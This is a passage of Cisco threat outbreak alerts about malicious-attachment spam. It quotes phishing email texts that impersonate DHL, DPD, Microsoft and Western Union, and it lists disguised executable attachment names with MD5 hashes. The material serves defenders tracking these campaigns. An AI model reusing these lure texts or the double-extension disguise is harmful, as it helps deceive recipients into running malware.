Sicherungs-DVD erwerben m\u00f6chten*, klicken Sie hier. \nSie m\u00f6chten die Software erneut herunterladen oder auf die Bestelldetails zugreifen?Einfach oder zur \u00dcbersicht Bestellungen. \nklicken Sie hier, um Kundensupport zu erhalten. \nMit freundlichen Gr\u00fc\u00dfen, \nMicrosoft Home Use Program \n*Klicken Sie hier, um die Versandzeiten f\u00fcr DVDs anzuzeigen. \nTransaktions- oder Pflicht-E-Mail \nMicrosoft respektiert Ihre Privatsph\u00e4re. Lesen Sie online unsere Datenschutzbestimmung, um mehr zu erfahren. \nMicrosoft Corporation \nOne Microsoft Way \nRedmond, WA, USA 98052 \nAntworten \nAllen antworten \nWeiterleiten**\n\nOr \n\n> Subject: **MMS id-4855380859**\n\nOr \n\n> Subject: **mms id 1670415068 \n**\n\nOr \n\n> Subject: **IRON EXE_Attachment _** \n \nMessage Body: \n \n**Sehr geehrter Paketempf\u00e4nger, \nIhre Sendung 84087530655869 von wird heute voraussichtlich. \nSollte eine Zustellung zu diesem Termin nicht m\u00f6glich sein, in der beigefugten Datei \n(24 Stunden an 7 Tagen in der Woche) einen alternativen Zustelltermin vereinbaren. \nAlternativ besteht die M\u00f6glichkeit, falls Sie das Paket nicht entgegennehmen k\u00f6nnen, uns eine einmalige Abstellgenehmigung zu erteilen. Bitte unterschreiben Sie diese und bringen Sie dieses gut sichtbar und erreichbar z.B. an Ihrer Haust\u00fcr oder Ihrem Briefkasten an. \nMit freundlichen Gr\u00fc\u00dfen \nIhr DPD \n**\n\nOr \n\n\n> Subject: **Elite Upgrade Notification \n \n**Message Body** \n \nYou\"ve been upgraded to Las Vegas, NV (LAS) on Wed., Aug. 12, 2013. Your new seat is 13F. Attachment is a recap of your flight information. \n**\n\nOr \n\n> Subject: **Invoice # AUG 12** \n \nMessage Body: \n \n**Attached is Invoice # AUG 12 from JETS PIZZA \nTo view the attachment, you must have the Adobe(r) Reader(r) software installed on your computer. To get a free version of this software from Adobe, click here: http://www.adobe.com/support/downloads/main.html \n**\n\nOr \n\n> Subject: **Paketank&#252;ndigung_zu_Ihrer_Sendung_127214245931** \n \nMessage Body: \n \n**Sehr geehrte Kundin, sehr geehrter Kunde, \ndie f\u00fcr Sie bestimmte Sendung 288920677917 wurde an DHL \u00fcbergeben und wird voraussichtlich am 09.08.2013 zugestellt. \nWeitere Informationen \u00fcber den Sendungsstatus stehen Ihnen durch die direkte Statusabfrage \u00fcber den folgenden Link zur Verf\u00fcgung: Sendungsverfolgung \nMit freundlichen Gr\u00fc\u00dfen, \nIhr DHL Team \nPS: Kennen Sie schon unser Privatkundenportal Paket.de? Registrieren Sie sich jetzt und profitieren Sie bei Ihren zuk\u00fcnftigen DHL Paketen von unseren flexiblen Empf\u00e4ngerservices. \nDiese Mail dient lediglich der Information und garantiert nicht die Zustellung der Sendung. Auf diese Mail kann nicht geantwortet werden. Ihre E-Mailadresse wird ausschlie\u00dflich f\u00fcr die Paketank\u00fcndigung der oben genannten Sendung genutzt und nicht zu werblichen Zwecken gespeichert. Sollten Sie die Paketank\u00fcndigung nicht mehr beziehen wollen, klicken Sie bitte hier: DHL Benachrichtigungsservice \nImpressum \nDeutsche Post AG \nVertreten durch den Vorstand \nHandelsregister-Nr.: Registergericht Bonn HRB 6792, USt-IdNr.: DE 169838187 \nCharles-de-Gaulle-Stra\u00dfe 20, 53113 Bonn \nWebsite Kontakt Impressum \n\u0160 2013 DHL \n**\n\nOr \n\n\n> Subject: **Order 77690444 Booked - Western Union Business Solutions Online FX for Corporate** \n \nMessage Body: \n \n**Please be advised that Order totaling 1,120.44 USD has been booked. \nOpen attached file to view details of the order or to print a receipt. \nThis email was sent by Western Union Business Solutions. We respect your right to privacy. View our policy. \nThank you for using Western Union Business Solutions. \nSincerely, \nWestern Union Business Solutions \nPlease do not reply directly to this system-generated e-mail. This address cannot accept incoming messages. If you have any questions please do not hesitate to call your Western Union Business Solutions Account Representative.** \n\n\nOr \n\n\n> Subject: **[TOCLAB]Your invoice is attached for the 8.16** \n \nMessage Body: \n \n**Ian Perez \nPrintwell \n29590 Northline Rd, Taylor, TX 49680 \nPhone: 702-956-5600, ext. 188, Fax: 758-946-1125 \nwww.printwell.com** \n\n\nOr \n\n> Subject: **Codice di sblocco per registrazione a www.vodafone.it \n** \nMessage Body: \n \n**il codice di sblocco per completare la registrazione del numero: \nE5MG8P \nPer i successivi accessi inserisci semplicemente la tua Username e la password nel box di Login.** \n\n\n> > ****\n\n> > > Cisco Security analysts examine real-world email traffic data that is collected from over 100,000 contributing organizations worldwide. This data helps provide a range of information about and analysis of global email security threats and trends. Cisco will continue to monitor this threat and automatically adapt systems to protect customers. This report will be updated if there are significant changes or if the risk to end users increases. \n \nCisco security appliances protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Email that is managed by Cisco and end users who are protected by Cisco Web Security Appliances will not be impacted by these attacks. Cisco security appliances are automatically updated to prevent both spam email and hostile web URLs from being passed to the end user. \n \n**Related Links** \n[Cisco Security](<http://www.cisco.com/security>) \n[Cisco SenderBase Security Network ](<http://www.senderbase.org/>)\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n95 | Cisco Security has detected significant activity on August 21, 2013. | | 2013-August-22 14:21 GMT \n94 | Cisco Security has detected significant activity on August 21, 2013. | | 2013-August-21 15:08 GMT \n93 | Cisco Security has detected significant activity on August 20, 2013. | | 2013-August-20 14:36 GMT \n92 | Cisco Security has detected significant activity on August 19, 2013. | | 2013-August-19 16:55 GMT \n91 | Cisco Security has detected significant activity on August 13, 2013. | | 2013-August-13 18:59 GMT \n90 | Cisco Security has detected significant activity on August 12, 2013. | | 2013-August-12 20:08 GMT \n89 | Cisco Security has detected significant activity on August 8, 2013. | | 2013-August-12 11:21 GMT \n88 | Cisco Security has detected significant activity on August 6, 2013. \n \n| | 2013-August-07 12:26 GMT \n87 | Cisco Security has detected significant activity on July 24, 2013. \n \n| | 2013-July-24 19:09 GMT \n86 | Cisco Security has detected significant activity on July 24, 2013. \n \n| | 2013-July-24 16:21 GMT \n85 | Cisco Security has detected significant activity on July 23, 2013. \n \n| | 2013-July-23 15:55 GMT \n84 | Cisco Security has detected significant activity on July 22, 2013. \n \n| | 2013-July-23 14:04 GMT \n83 | Cisco Security has detected significant activity on July 22, 2013. \n \n| | 2013-July-22 15:26 GMT \n82 | Cisco Security has detected significant activity on July 18, 2013. \n \n| | 2013-July-18 14:56 GMT \n81 | Cisco Security has detected significant activity on July 17, 2013. \n \n| | 2013-July-17 20:42 GMT \n80 | Cisco Security has detected significant activity on July 16, 2013. \n \n| | 2013-July-17 11:56 GMT \n79 | Cisco Security has detected significant activity on July 16, 2013. \n \n| | 2013-July-16 16:50 GMT \n78 | Cisco Security has detected significant activity on July 12, 2013. \n \n| | 2013-July-15 11:46 GMT \n77 | Cisco Security has detected significant activity on July 11, 2013. \n \n| | 2013-July-12 11:20 GMT \n76 | Cisco Security has detected significant activity on July 9, 2013. \n \n| | 2013-July-10 13:11 GMT \n75 | Cisco Security has detected significant activity on July 3, 2013. \n \n| | 2013-July-05 13:39 GMT \n74 | Cisco Security has detected significant activity on July 3, 2013. \n \n| | 2013-July-03 14:57 GMT \n73 | Cisco Security has detected significant activity on July 2, 2013. \n \n| | 2013-July-03 13:12 GMT \n72 | Cisco Security has detected significant activity on July 1, 2013. \n \n| | 2013-July-01 18:51 GMT \n71 | Cisco Security has detected significant activity on July 1, 2013. \n \n| | 2013-July-01 14:23 GMT \n70 | Cisco Security has detected significant activity on June 26, 2013. \n \n| | 2013-June-26 15:29 GMT \n69 | Cisco Security has detected significant activity on June 23, 2013. \n \n| | 2013-June-24 20:46 GMT \n68 | Cisco Security has detected significant activity on June 20, 2013. \n \n| | 2013-June-21 13:49 GMT \n67 | Cisco Security has detected significant activity on June 20, 2013. \n \n| | 2013-June-20 15:38 GMT \n66 | Cisco Security has detected significant activity on June 18, 2013. \n \n| | 2013-June-19 14:52 GMT \n65 | Cisco Security has detected significant activity on June 18, 2013. \n \n| | 2013-June-18 19:38 GMT \n64 | Cisco Security has detected significant activity on June 16, 2013. \n \n| | 2013-June-17 13:30 GMT \n63 | Cisco Security has detected significant activity on June 14, 2013. \n \n| | 2013-June-14 13:48 GMT \n62 | Cisco Security has detected significant activity on June 13, 2013. \n \n| | 2013-June-13 17:00 GMT \n61 | Cisco Security has detected significant activity on June 11, 2013. \n \n| | 2013-June-12 13:47 GMT \n60 | Cisco Security has detected significant activity on June 11, 2013. \n \n| | 2013-June-11 15:22 GMT \n59 | Cisco Security has detected significant activity on June 10, 2013. \n \n| | 2013-June-10 18:50 GMT \n58 | Cisco Security has detected significant activity on June 6, 2013. \n \n| | 2013-June-07 13:10 GMT \n57 | Cisco Security has detected significant activity on June 6, 2013. \n \n| | 2013-June-06 19:10 GMT \n56 | Cisco Security has detected significant activity on June 5, 2013. \n \n| | 2013-June-06 14:52 GMT \n55 | Cisco Security has detected significant activity on June 5, 2013. \n \n| | 2013-June-05 17:06 GMT \n54 | Cisco Security has detected significant activity on June 3, 2013. \n \n| | 2013-June-04 11:22 GMT \n53 | Cisco Security has detected significant activity on June 3, 2013. \n \n| | 2013-June-03 19:08 GMT \n52 | Cisco Security has detected significant activity on June 3, 2013. \n \n| | 2013-June-03 15:07 GMT \n51 | Cisco Security has detected significant activity on May 30, 2013. \n \n| | 2013-May-30 18:43 GMT \n50 | Cisco Security has detected significant activity on May 15, 2013. \n \n| | 2013-May-15 14:03 GMT \n49 | Cisco Security has detected significant activity on May 10, 2013. \n \n| | 2013-May-10 16:58 GMT \n48 | Cisco Security has detected significant activity on April 25, 2013. \n \n| | 2013-April-25 15:36 GMT \n47 | Cisco Security has detected significant activity on April 23, 2013. \n \n| | 2013-April-24 15:05 GMT \n46 | Cisco Security has detected significant activity on April 22, 2013. \n \n| | 2013-April-23 18:09 GMT \n45 | Cisco Security has detected significant activity on April 17, 2013. \n \n| | 2013-April-18 14:11 GMT \n44 | Cisco Security has detected significant activity on April 16, 2013. \n \n| | 2013-April-16 15:23 GMT \n43 | Cisco Security has detected significant activity on April 15, 2013. \n \n| | 2013-April-15 20:55 GMT \n42 | Cisco Security has detected significant activity on April 9, 2013. \n \n| | 2013-April-11 14:41 GMT \n41 | Cisco Security has detected significant activity on April 4, 2013. \n \n| | 2013-April-08 17:02 GMT \n40 | Cisco Security has detected significant activity on April 4, 2013. \n \n| | 2013-April-04 17:16 GMT \n39 | Cisco Security has detected significant activity on April 3, 2013. \n \n| | 2013-April-03 20:11 GMT \n38 | Cisco Security has detected significant activity on March 28, 2013. \n \n| | 2013-March-29 19:46 GMT \n37 | Cisco Security has detected significant activity on March 28, 2013. \n \n| | 2013-March-28 19:09 GMT \n36 | Cisco Security has detected significant activity on March 25, 2013. \n \n| | 2013-March-26 12:58 GMT \n35 | Cisco Security has detected significant activity on March 14, 2013. \n \n| | 2013-March-14 15:36 GMT \n34 | Cisco Security has detected significant activity on March 13, 2013. \n \n| | 2013-March-13 14:22 GMT \n33 | Cisco Security has detected significant activity on March 11, 2013. \n \n| | 2013-March-11 15:53 GMT \n32 | Cisco Security has detected significant activity on March 7, 2013. \n \n| | 2013-March-07 20:34 GMT \n31 | Cisco Security has detected significant activity on March 6, 2013. \n \n| | 2013-March-06 21:11 GMT \n30 | Cisco Security has detected significant activity on March 5, 2013. \n \n| | 2013-March-05 19:46 GMT \n29 | Cisco Security has detected significant activity on March 5, 2013. \n \n| | 2013-March-05 15:27 GMT \n28 | Cisco Security has detected significant activity on February 15, 2013. \n \n| | 2013-February-18 14:58 GMT \n27 | Cisco Security has detected significant activity on February 13, 2013. \n \n| | 2013-February-14 12:20 GMT \n26 | Cisco Security has detected significant activity on February 11, 2013. \n \n| | 2013-February-11 16:21 GMT \n25 | Cisco Security has detected significant activity on February 7, 2013. \n \n| | 2013-February-07 15:04 GMT \n24 | Cisco Security has detected significant activity on February 6, 2013. \n \n| | 2013-February-06 16:41 GMT \n23 | Cisco Security has detected significant activity on February 5, 2013. \n \n| | 2013-February-05 15:08 GMT \n22 | Cisco Security has detected significant activity on February 4, 2013. \n \n| | 2013-February-04 17:43 GMT \n21 | Cisco Security has detected significant activity on February 4, 2013. \n \n| | 2013-February-04 15:29 GMT \n20 | Cisco Security has detected significant activity on February 1, 2013. \n \n| | 2013-February-01 16:29 GMT \n19 | Cisco Security has detected significant activity on January 30, 2013. \n \n| | 2013-January-30 14:58 GMT \n18 | Cisco Security has detected significant activity on January 28, 2013. \n \n| | 2013-January-28 17:12 GMT \n17 | Cisco Security has detected significant activity on January 23, 2013. \n \n| | 2013-January-23 17:28 GMT \n16 | Cisco Security has detected significant activity on January 23, 2013. \n \n| | 2013-January-23 14:47 GMT \n15 | Cisco Security has detected significant activity on January 22, 2013. \n \n| | 2013-January-22 17:13 GMT \n14 | Cisco Security has detected significant activity on January 14, 2013. \n \n| | 2013-January-14 16:07 GMT \n13 | Cisco Security has detected significant activity on December 26, 2012. \n \n| | 2013-January-02 17:29 GMT \n12 | Cisco Security has detected significant activity on December 18, 2012. \n \n| | 2012-December-20 15:23 GMT \n11 | Cisco Security has detected significant activity on December 12, 2012. \n \n| | 2012-December-13 14:14 GMT \n10 | Cisco Security has detected significant activity on December 11, 2012. \n \n| | 2012-December-12 16:09 GMT \n9 | Cisco Security has detected significant activity on December 10, 2012. \n \n| | 2012-December-10 20:41 GMT \n8 | Cisco Security has detected significant activity on December 9, 2012. \n \n| | 2012-December-10 17:46 GMT \n7 | Cisco Security has detected significant activity on December 7, 2012. \n \n| | 2012-December-07 21:47 GMT \n6 | Cisco Security has detected significant activity on December 6, 2012. \n \n| | 2012-December-06 20:27 GMT \n5 | Cisco Security has detected significant activity on December 5, 2012. \n \n| | 2012-December-05 20:34 GMT \n4 | Cisco Security has detected significant activity on December 4, 2012. \n \n| | 2012-December-04 18:28 GMT \n3 | Cisco Security has detected significant activity on November 30, 2012. \n \n| | 2012-December-01 03:44 GMT \n2 | Cisco Security has detected significant activity on August 9, 2012. | | 2012-December-01 03:44 GMT \n1 | Cisco Security has detected significant activity on September 10, 2011. | | 2011-September-12 13:30 GMT \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "modified": "2013-08-22T14:21:22", "published": "2011-09-12T13:30:16", "id": "CISCO-THREAT-24111", "href": "http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24111", "type": "ciscothreats", "title": "Threat Outbreak Alert: Malicious Attachment Email Messages on August 21, 2013", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-26T12:03:54", "bulletinFamily": "info", "cvelist": [], "description": "Medium\n\nAlert ID: \n\n23517\n\nFirst Published:\n\n2011 June 29 14:00 GMT\n\nLast Updated:\n\n2014 April 10 13:53 GMT\n\nVersion: \n\n80\n\n## \n\n Summary \n\n * Cisco Security has detected significant activity related to spam email messages that claim to contain an electronic payment cancellation for the recipient. The text in the e-mail message attempts to convince the recipient to open the attachment and view the details. However, the _.zip_ attachment contains a malicious _.exe_ file that, when executed, attempts to infect the system with malicious code. \n \nEmail messages that are related to this threat (RuleID2969, RuleID2969KVR, RuleID2970KVR, RuleID2970_1KVR, RuleID4441KVR, RuleID3800, and RuleID2970KVR_1) may contain any of the following files:\n\n> _transaction-report.pdf.exe_ \n_304694305894903.pdf.exe_ \n_canceled_report_43893842.pdf.exe_ \n_canceled_report_43893892.pdf.exe_ \n_report_3050439643.pdf.exe_ \n_000740295023US.pdf.exe_ \n_Corpinvoice_09.05_V716200.zip_ \n_INVOIC~1.EXE_ \n_report_1409.pdf.zip_ \n_report_1409.pdf.exe_ \n_report_1509.pdf.zip_ \n_report_1509.pdf.exe_ \n_report_1609.pdf.zip_ \n_report_1609.pdf.exe_ \n_report_092011-78.pdf.zip_ \n_report_092011-78.pdf.exe_ \n_report-d30261180.zip_ \n_report-d30261180.pdf.exe_ \n_report_3482736.doc.zip_ \n_report_3482736.doc.exe_ \n_report.94875793049.pdf.zip_ \n_report.94875793049.pdf.exe_ \n_report.zip_ \n_report_10112011.pdf.exe_ \n_report_9698588.pdf.exe_ \n_report 837749598.pdf.zip_ \n_report 837749598.pdf.exe_ \n_report 485770.pdf.zip_ \n_report 485770.pdf.exe_ \n_report_69975410005588.pdf.zip_ \n_report_69975410005588.pdf.exe_ \n_Case # 23111396.pdf.zip_ \n_Case # 23111396.pdf.exe_ \n_id463473483745.pdf.exe_ \n_25.11.pdf.zip_ \n_25.11.pdf.exe_ \n_FED_REFERENCE_67989HG78.auto.pdf.exe_ \n_Case # 54822368-11-25 Dandre Johnson.pdf.zip_ \n_Case # 54822368-11-25 Dandre Johnson.pdf.exe_ \n_contrato_aprovado.pdf.exe_ \n_rapport.pdf.exe_ \n_Recibo_NF.17240-0248_2012.pdf.exe_ \n_wu-paymentslip.pdf.exe_ \n_IMG9321.jpg.zip_ \n_IMG9231.jpg.exe_ \n_download.jpg.exe_ \n_Orcamento.PDF.exe_ \n_equitygroup.pdf.exe_ \n_20120711_005004.jpg.exe_ \n_report.pdf.exe_ \n_report.pdf.zip_ \n_IRSReport.pdf.exe_ \n_Swift Payment for the Purchase Balance of $60, 000 USD From Aileen Fountain.pdf.exe_ \n_ACH-Payment-Transaction-6E6DB6ED2FB.zip_ \n_ACH_Payment_Details_ID-434234234EC234234AF4353452345CC32423423FF423423445567EE009294782.pdf.exe_ \n_M17501819245.pdf.scr_ \n_invoiceB5VADUOG4G868MZRFH.JPG.exe_ \n_Payment_Authentication_Receipt_87596112329340.pdf.zip_ \n_Payment_Authentication_Receipt.pdf.exe_ \n_Australian PowerGas_ReceiptDetails2831135224.zip_ \n_Transaction Details.pdf.exe_ \n_Jackgreen-Energy-Transaction-Receipt.zip_ \n_Jackgreen-Energy-Transaction-Receipt.pdf.exe_ \n_EuropCar Invoice.zip_ \n_EuropCar Invoice.pdf.exe_ \n_ACH_Report-673D6535C46E.zip_ \n_ACH_Report-673D6535C46E.pdf.scr_ \n_invoiceJVQ9A8VIZ52LYZ3R66.JPG.exe_ \n_Geico - SSNYDER@GEICO.COM.pdf.zip_ \n_Geico - SSNYDER@GEICO.COM.pdf.exe_ \n_E-FATURA-9407544438.pdf.zip_ \n_E-FATURA-76497321988.pdf.exe_ \n_D_1964691LawndaleESD.xls.exe_ \n_report_pdf.exe_ \n_Tax.Refund.Confidential.Message.zip_ \n_Tax.Refund.Confidential.Message.html.exe_ \n_Tax.Refund.Confidential.Message.PDF.exe_ \n_AWB-Avis 768-38251502.pdf.zip_ \n_AWB-Avis 240-11980057.pdf.exe_ \n_ADP-TotalSource-Payroll-Invoice-01B10F09552A.zip_ \n_ADP TotalSource Payroll Invoice ID-EF2342AC2357-AA-43345435345345234234234356456.pdf.exe_ \n_ADP-TotalSource-Payroll-Invoice-3D8C226BEC.zip_ \n_ADP TotalSource Payroll Invoice #-85703433498405-3421487568567-74-0582134097475657-62243 \n8578247584732752374705143765348653456893473686525456.pdf.exe_ \n_AWB-Avis 432-85560399.pdf.zip_ \n_AWB-Avis 455-74906491.pdf.exe_ \n_Rejected_Transfer.zip_ \n_Wire_Transfr_Cancel_N9923902.doc.exe_ \n_fedach_rprt_03072013-0136.zip_ \n_fedach_rprt_0307131053.PDF.exe_ \n_Account-Statement-ll1054070.zip_ \n_Account-Statement-ll9305602.pdf.exe_ \n_AUSPOST Track Advice Notification.pdf.zip_ \n_AUSPOST Track Advice Notification.pdf.exe_ \n_8089-TGP-Account-Details.zip_ \n_TGP-Account-Details.doc.exe_ \n_Ravenswood_req1rev.xls.exe_ \n_9465-payslip.pdf.zip_ \n_2711-payslip.pdf.exe_ \n_Order Details - Western Union Online FX.zip_ \n_Order Details - Western Union.doc.exe_ \n_Die Einzelheiten Ihres Einkaufs.zip_ \n_Die Einzelheiten Ihres Einkaufs.pdf.exe_ \n_Auftragsbestaetigung_155756.zip_ \n_Auftragsbestaetigung_659022.pdf.exe_ \n_report0107446.PDF.exe_ \n_report0975346.PDF.exe_ \n_Ihre Reservierung 872769489.zip_ \n_Ihre Reservierung 987127600.pdf.exe_ \n_bankcopy.jpg.scr_ \n_report0108696.PDF.exe_ \n_report0108136.PDF.exe_ \n_Bill transactions 695936805.zip_ \n_Bill transactions 74658374639.pdf.exe_ \n_DOC_alan.zip_ \n_WellsFargo_0715201.PDF.exe_ \n_File-Report.zip_ \n_Scan_Report.xls.scr_ \n_auguri.jpg.exe_ \n_payment.pdf.zip_ \n_payment.pdf.exe_ \n_2013_Federal_Tax_Return.pdf.zip_ \n_2013_Federal_Tax_Return.pdf.exe_ \n_payment slip.pdf.zip_ \n_payment slip.pdf.scr_ \n_WU INFORMATION REF # 623-724-5013.jpeg.zip_ \n_WU INFORMATION REF # 623-724-5013.jpeg.scr \n__Payment.zip \nPayment.txt.exe \nJWS-Boleto-Assessoria-Juridica.PDF.zip \nJWS-2via-boleto-Abril-2014-PDF.cpl \n_\n\nThe _transaction-report.pdf.exe_ file has a file size of 172,032 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x975245A86E8E4F4CE6B7A398B7FF9A18 \n \nThe _304694305894903.pdf.exe_ file has a file size of 172,032 bytes. The MD5 checksum is the following string: 0xFBF3FA9FB72BCCD1B58177E2201AADE3 \n \nThe _canceled_report_43893842.pdf.exe_ file has a file size of 158,208 bytes. The MD5 checksum is the following string: 0x15299057B8A32DE1B96D6435C36ABA5B \n \nThe _canceled_report_43893892.pdf.exe_ file has a file size of 158,208 bytes. The MD5 checksum is the following string: 0x1EAD1F7741CF8E47F018C71863A4A7FC \n \nThe _report_3050439643.pdf.exe_ file has a file size of 150,016 bytes. The MD5 checksum is the following string: 0x8DA13FADEFC59483570BC541844052E2 \n \nThe _000740295023US.pdf.exe_ file has a file size of 156,160 bytes. The MD5 checksum is the following string: 0xFAF7B138CCBDEB35ABC63132CAE9B298 \n \nThe _INVOIC~1.EXE_ file has a file size of 48,128 bytes. The MD5 checksum is the following string: 0x5DDE802DDFEF492148110A1DD233D50B \n \nThe _report_1409.pdf.exe_ file in the _report_1409.pdf.zip_ attachment has a file size of 85,504 bytes. The MD5 checksum is the following string: 0x97AFA870CE8F3E4ED2A067F56D3A1D18 \n \nThe _report_1509.pdf.exe_ file in the _report_1509.pdf.zip_ attachment has a file size of 37,376 bytes. The MD5 checksum is the following string: 0xC47987554D4D5139F8F1F691DE1478AD \n \nThe _report_1609.pdf.exe_ file in the _report_1609.pdf.zip_ attachment a file size of 36,864 bytes. The MD5 checksum is the following string: 0x866C891BA9D737A4E3B8E96DB6989661 \n \nA variant of the _report_1609.pdf.exe_ file in the _report_1609.pdf.zip_ attachment has a file size of 37,376 bytes. The MD5 checksum is the following string: 0xC24BEDA407F9997E3391C9D2E7D3DE31 \n \nThe _report_092011-78.pdf.exe_ file in the _report_092011-78.pdf.zip_ attachment has a file size of 37,376 bytes. The MD5 checksum is the following string: 0x64D5C423143BAE1F0C5919D2400D9C61 \n \nA variant of the _report_092011-78.pdf.exe_ file in the _report_092011-78.pdf.zip_ attachment has a file size of 38,912 bytes. The MD5 checksum is the following string: 0x5AD97A55462D586F9ED80D703B6635C6 \n \nThe _report-d30261180.pdf.exe_ file in the _report-d30261180.zip_ attachment has a file size of 13,061 bytes. The MD5 checksum is the following string: 0xD603E71BD7F3C8B152E44D3B78AF40CE \n \nThe _report_3482736.doc.exe_ file in the _report_3482736.doc.zip_ attachment has a file size of 58,368 bytes. The MD5 checksum is the following string: 0xFB3ED60A84F0EEBF793795DB6BC5EC5C \n \nThe _report.94875793049.pdf.exe_ file in the _report.94875793049.pdf.zip_ attachment has a file size of 40,448 bytes. The MD5 checksum is the following string: 0xEC70D9734270CA47D7C9A1CF64682452 \n \nThe _report_10112011.pdf.exe_ file in the _report.zip_ attachment has a file size of 55,296 bytes. The MD5 checksum is the following string: 0xC73917A997AB8E79CCB31095B22D6CA9 \n \nThe _report_9698588.pdf.exe_ file has a file size of 198,144 bytes. The MD5 checksum is the following string: 0x4F9686CB3767B8A9AE69DA06832DFF6D \n \nThe _report 837749598.pdf.exe_ file in the _report 837749598.pdf.zip_ attachment has a file size of 33,792 bytes. The MD5 checksum is the following string: 0x7046F3AA234EC183F12C4E592C34DBB0 \n \nThe _report 485770.pdf.exe_ file in the _report 485770.pdf.zip_ attachment has a file size of 33,280 bytes. The MD5 checksum is the following string: 0xCDA31C084A71D582816E1C577F88AB21 \n \nThe _report_69975410005588.pdf.exe_ file in the _report_69975410005588.pdf.zip_ attachment has a file size of 182,272 bytes. The MD5 checksum is the following string: 0xD61E9115C9E7B9BEF51279BAB59D80E8 \n \nThe _Case # 23111396.pdf.exe_ file in the _Case # 23111396.pdf.zip_ attachment has a file size of 175,616 bytes. The MD5 checksum is the following string: 0x0B7A07B56C031844EE5A8BCD43515789 \n \nThe _id463473483745.pdf.exe_ file has a file size of 197,632 bytes. The MD5 checksum is the following string: 0xE489F1745C6727675907BE3F4355DCEE \n \nThe _25.11.pdf.exe_ file in the _25.11.pdf.zip_ attachment has a file size of 96,768 bytes. The MD5 checksum is the following string: 0xB442A3DDF687FF3FC7707683BA8B1E95 \n \nThe _FED_REFERENCE_67989HG78.auto.pdf.exe_ file has a file size of 92,160 bytes. The MD5 checksum is the following string: 0xF7C4BBE6F0EE13E5FD14AE69F33172D1 \n \nThe _Case # 54822368-11-25 Dandre Johnson.pdf.exe_ file in the _Case # 54822368-11-25 Dandre Johnson.pdf.zip_ attachment has a file size of 197,120 bytes. The MD5 checksum is the following string: 0xD7CBE3D4DAF0784A7F2B375BC4452B79 \n \nA variant of the _25.11.pdf.exe_ file in the _25.11.pdf.zip_ attachment has a file size of 131,072 bytes. The MD5 checksum is the following string: 0x5F129FD20E51A3E437E51CB7CABB6856 \n \nThe _contrato_aprovado.pdf.exe_ file has a file size of 772,096 bytes. The MD5 checksum is the following string: 0xB8A9BCC2CA7B378BB9D018A26E3561CC \n \nThe _rapport.pdf.exe_ file has a file size of 199,168 bytes. The MD5 checksum is the following string: 0x75D499D14405B3B24E0835F7F69F0A13 \n \nA variant of the _rapport.pdf.exe_ file has a file size of 192,512 bytes. The MD5 checksum is the following string: 0x7BA5315E66700F685826AD3F540E00C3 \n \nThe _Recibo_NF.17240-0248_2012.pdf.exe_ file has a file size of 378,368 bytes. The MD5 checksum is the following string: 0xFED86237D25B2E549AE31A932755F6F7 \n \nThe _wu-paymentslip.pdf.exe_ file has a file size of 648,745 bytes. The MD5 checksum is the following string: 0x8D6F02E7315513F3724D7FB1CA708F15 \n \nThe _IMG9231.jpg.exe_ file in the _IMG9321.jpg.zip_ attachment has a file size of 64,512 bytes. The MD5 checksum is the following string: 0x3281EFED263FD4EE5F7D0796CCEBCAE7 \n \nThe _download.jpg.exe_ file has a file size of 133,632 bytes. The MD5 checksum is the following string: 0x198112ACAA88729B0FDF73FD181352F1 \n \nThe _Orcamento.PDF.exe_ file has a file size of 618,496 bytes. The MD5 checksum is the following string: 0xD36C55BC4452FA005EAEDE1335D7E1C4 \n \nThe _equitygroup.pdf.exe_ file in the attachment has a file size of 192,512 bytes. The MD5 checksum is the following string: 0x662A62C52822E56238439E5F310B7D31 \n \nThe _20120711_005004.jpg.exe _file has a file size of 81,920 bytes. The MD5 checksum is the following string: 0xFE79EC4B8B8B5F1DBAE3E4A5BEBFF2C5 \n \nA variant of the _20120711_005004.jpg.exe_ file has a file size of 81,920 bytes. The MD5 checksum is the following string: 0x7988E66F4EC56B98B264A3EEA453F639 \n \nThe _report.pdf.exe_ file has a file size of 199,681 bytes. The MD5 checksum is the following string: 0x7B9D577F5459090AA40159617EA0EF94 \n \nThe _IRSReport.pdf.exe_ file has a file size of 65,361 bytes. The MD5 checksum is the following string: 0x31FDC10461D6B9CA9880240401845845 \n \nThe _Swift Payment for the Purchase Balance of $60, 000 USD From Aileen Fountain.pdf.exe_ file has a file size of 836,096 bytes. The MD5 checksum is the following string: 0x73848930F556EC5F57E10C43EE8B0D9A \n \nThe _ACH_Payment_Details_ID-434234234EC234234AF4353452345CC32423423FF423423445567EE009294782.pdf.exe_ file in the _ACH-Payment-Transaction-6E6DB6ED2FB.zip_ attachment has a file size of 202,240 bytes. The MD5 checksum is the following string: 0x8ABBE404EE7B050A3BACB7313D9C7C74 \n \nThe _M17501819245.pdf.scr_ file has a file size of 555,240 bytes. The MD5 checksum is the following string: 0xC36B922A815BCF648BA5089D9D3AF00C \n \nThe _invoiceB5VADUOG4G868MZRFH.JPG.exe_ file has a file size of 140,800 bytes. The MD5 checksum is the following string: 0x189D89811C3C64016978DADF9E11A553 \n \nA variant of the _report.pdf.exe _file has a file size of 196,097 bytes. The MD5 checksum is the following string: 0x1FBD61C0A5EBE53A99BCFD8646347A95 \n \nThe _Payment_Authentication_Receipt.pdf.exe_ file in the _Payment_Authentication_Receipt_87596112329340.pdf.zip_ attachment has an approximate file size of 33,177 bytes. The MD5 checksum is not available. \n \nThe _Transaction Details.pdf.exe_ file in the _Australian PowerGas_ReceiptDetails2831135224.zip_ attachment has an approximate file size of 40,960 bytes. The MD5 checksum is not available. \n \nThe _Jackgreen-Energy-Transaction-Receipt.pdf.exe_ file in the 